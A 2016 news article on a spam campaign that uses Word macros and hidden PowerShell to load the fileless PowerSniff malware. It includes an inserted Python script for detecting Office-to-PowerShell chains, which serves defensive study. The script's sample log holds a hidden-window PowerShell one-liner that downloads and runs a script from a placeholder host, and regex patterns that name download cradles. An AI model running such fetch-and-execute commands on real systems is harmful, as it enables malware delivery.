Malware Combo Packs Punch

Tuesday, March 15, 2016 @ 04:03 PM gHale


There is a new attack approach that combines spam campaigns, malicious Word documents, and PowerShell code to deliver fileless malware – and victims are falling for it.

At face value, none of these techniques is new, but the combination packs a powerful punch.


It also shows malware developers are paying closer attention to security research and the work of some of their peers, borrowing techniques from each other in their ever-present struggle to evade detection, according to researchers from Palo Alto Networks.

This campaign is small but has the potential to grow, according to the researchers.

Malware operators are using spam emails to deliver infected Word documents to their victims. Despite Word’s macro feature being a hotbed for malware, there are Microsoft Office installations where Word macros are enabled and execute automatically when the document opens.

This means that whenever the spam campaign fools a user into opening the document, the malicious macro code runs automatically.

For this campaign, the macro code packed with each malicious document starts a hidden instance of Windows PowerShell, a powerful scripting language bundled with Windows since Windows 7, and then downloads malicious scripts that the PowerShell instance executes, said Palo Alto researchers.
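A defender-side illustration of the chain just described. The block below is an added example, not code from the article or from Palo Alto Networks: it parses a constructed, simplified key=value rendering of process-creation events (the field names ParentImage, Image and CommandLine are borrowed from Sysmon Event ID 1, but the records themselves are invented) and flags an Office application spawning PowerShell with a hidden window, a download cradle or an encoded command. It generalizes slightly beyond the article by treating Excel and PowerPoint like Word; the OFFICE_APPS and POWERSHELL sets, the indicator regexes and the verdict thresholds are assumptions chosen for illustration, not a vendor's rule set.

```python
"""Flag Office -> hidden PowerShell -> download chains in process-creation logs.

Added example, not the article's or Palo Alto Networks' code.  The log format
is a constructed key=value rendering; only the field names mirror Sysmon
Event ID 1.
"""
import re
from pathlib import PureWindowsPath

# Constructed sample events (invented for this example, not real telemetry).
SAMPLE_LOG = r'''
ParentImage="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -NoProfile -Command Get-Process"
ParentImage="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" Image="C:\Windows\splwow64.exe" CommandLine="C:\Windows\splwow64.exe 12288"
ParentImage="C:\Program Files\Microsoft Office\Office16\EXCEL.EXE" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\report.ps1"
'''

# Assumed process names; the article discusses Word, the other Office apps are a generalization.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# PowerShell accepts unambiguous prefixes of parameter names, so "-W Hidden"
# and "-WindowStyle Hidden" both hide the window; the regex approximates that.
HIDDEN_RE = re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I)
# Common ways a one-liner fetches a remote script (download cradle).
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|downloaddata|net\.webclient|invoke-webrequest"
    r"|\biwr\b|invoke-restmethod|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}", re.I)

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line):
    """Turn one key="value" log line into a dict."""
    return dict(FIELD_RE.findall(line))


def analyze_event(event):
    """Return a verdict and the indicators that fired for one event."""
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    cmd = event.get("CommandLine", "")

    indicators = []
    if parent in OFFICE_APPS:
        indicators.append("office_parent")
    if image in POWERSHELL:
        indicators.append("powershell_child")
    if HIDDEN_RE.search(cmd):
        indicators.append("hidden_window")
    if DOWNLOAD_RE.search(cmd):
        indicators.append("download_cradle")
    if ENCODED_RE.search(cmd):
        indicators.append("encoded_command")

    # Office spawning PowerShell is worth a look on its own; with a hidden
    # window, a download cradle or an encoded command it is the pattern the
    # article describes.  Thresholds are an assumption for this example.
    if "office_parent" in indicators and "powershell_child" in indicators:
        verdict = "suspicious" if len(indicators) > 2 else "review"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": indicators,
            "parent": parent, "image": image}


def scan_log(text):
    """Analyze every non-empty line of a log and return the results in order."""
    return [analyze_event(parse_event(line))
            for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for result in scan_log(SAMPLE_LOG):
        print(f"{result['verdict']:10} {result['parent']} -> {result['image']} "
              f"{result['indicators']}")
```

Run as a script it prints one verdict per sample event: the Word-to-hidden-PowerShell line with a download cradle is reported as suspicious, the Excel-to-PowerShell line as review, and the other two as benign. In a real deployment the same three checks map onto a process-creation data source such as Sysmon or Windows Security event 4688 with command-line auditing enabled.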

The scripts support both 32-bit and 64-bit platforms and begin with a series of tests: they check that the computer is not a virtual machine and that no debugging tools are running, and then look for “trigger” words in the computer’s cache and network configuration.

The string check covers both “stop” words and “go” words. If strings such as hospital, school, college, nurse, and doctor are found, the script stops executing immediately. If strings related to shops, stores, and PoS systems are found on the target, the scripts proceed to download whatever malware family the C&C servers instruct them to download.

When this happens, the malware, named PowerSniff, is written directly to the computer’s memory without ever touching the user’s hard drive, so classic file-based antivirus scanning does not see it.

At the moment, the spam campaign has mainly targeted users living in the U.S., Canada, the UK, France, Germany, Austria, and Poland.